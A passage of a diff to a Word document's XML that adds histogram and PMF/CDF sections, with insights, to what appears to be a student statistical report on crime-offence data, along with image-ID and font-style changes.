-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Before getting the PMF and CDF information, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>its</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> important to prepare the dataset.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  To improve the clarity and visualization of the data, </w:t>
-      </w:r>
-      <w:r>
-        <w:t>it’s</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> important to add a new reference column that identifies each Type of Offence</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7109AA25" wp14:editId="30836D73">
-            <wp:extent cx="3748088" cy="1673378"/>
-            <wp:effectExtent l="0" t="0" r="5080" b="3175"/>
-            <wp:docPr id="1132297921" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1132297921" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPr id="1981012682" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -10088,7 +9826,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3767626" cy="1682101"/>
+                      <a:ext cx="1816115" cy="1598429"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -10099,6 +9837,506 @@
             </a:graphic>
           </wp:inline>
         </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve">Histograms provide a visual representation of the distribution of </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>it is useful f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>or understanding the characteristics of your data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FFF9309" wp14:editId="21B2BF9F">
+            <wp:extent cx="3645568" cy="2666658"/>
+            <wp:effectExtent l="0" t="0" r="0" b="635"/>
+            <wp:docPr id="1775948448" name="Picture 1" descr="A graph with numbers and lines&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1775948448" name="Picture 1" descr="A graph with numbers and lines&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3659659" cy="2676965"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve">Figure 05 – histogram of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>crime_df</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Insights:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>There are some insights that you can get from the bin plot:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>The distribution of the VALUE column is skewed to the right. This means that there are more values on the right side of the distribution than on the left side.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>The median value of the VALUE column is between 10,000 and 15,000.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="4" w:name="_Toc59959351"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2.1 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>PFM and CDF</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="4"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Pmf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Cdf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> are classes that represent probability mass functions (PMFs) and cumulative distribution functions (CDFs), respectively.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="17"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>A PMF is a function that gives the probability of each possible value of a discrete random variable.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="17"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>A CDF is a function that gives the probability that a random variable will take on a value less than or equal to a given value.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10198,7 +10436,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId20"/>
+                    <a:blip r:embed="rId21"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -10347,7 +10585,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId21"/>
+                    <a:blip r:embed="rId22"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -10403,7 +10641,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId22"/>
+                    <a:blip r:embed="rId23"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -10457,7 +10695,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Insights</w:t>
       </w:r>
       <w:r>
@@ -10484,50 +10721,66 @@
       <w:pPr>
         <w:pStyle w:val="HTMLPreformatted"/>
         <w:rPr>
-          <w:rStyle w:val="HTMLCode"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>The most common type of offence is theft and related offences</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> with </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>30%</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">. This is followed by robbery, </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
-          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>extortion</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
-          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>and hijacking offences.</w:t>
       </w:r>
@@ -10536,12 +10789,16 @@
       <w:pPr>
         <w:pStyle w:val="HTMLPreformatted"/>
         <w:rPr>
-          <w:rStyle w:val="HTMLCode"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>The least common types of offences are kidnapping and related offences.</w:t>
       </w:r>
@@ -10550,12 +10807,16 @@
       <w:pPr>
         <w:pStyle w:val="HTMLPreformatted"/>
         <w:rPr>
-          <w:rStyle w:val="HTMLCode"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>The distribution of offences is skewed, with a few types of offences being much more common than others.</w:t>
       </w:r>
@@ -10657,7 +10918,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId23"/>
+                    <a:blip r:embed="rId24"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -10748,26 +11009,34 @@
       <w:pPr>
         <w:pStyle w:val="HTMLPreformatted"/>
         <w:rPr>
-          <w:rStyle w:val="HTMLCode"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
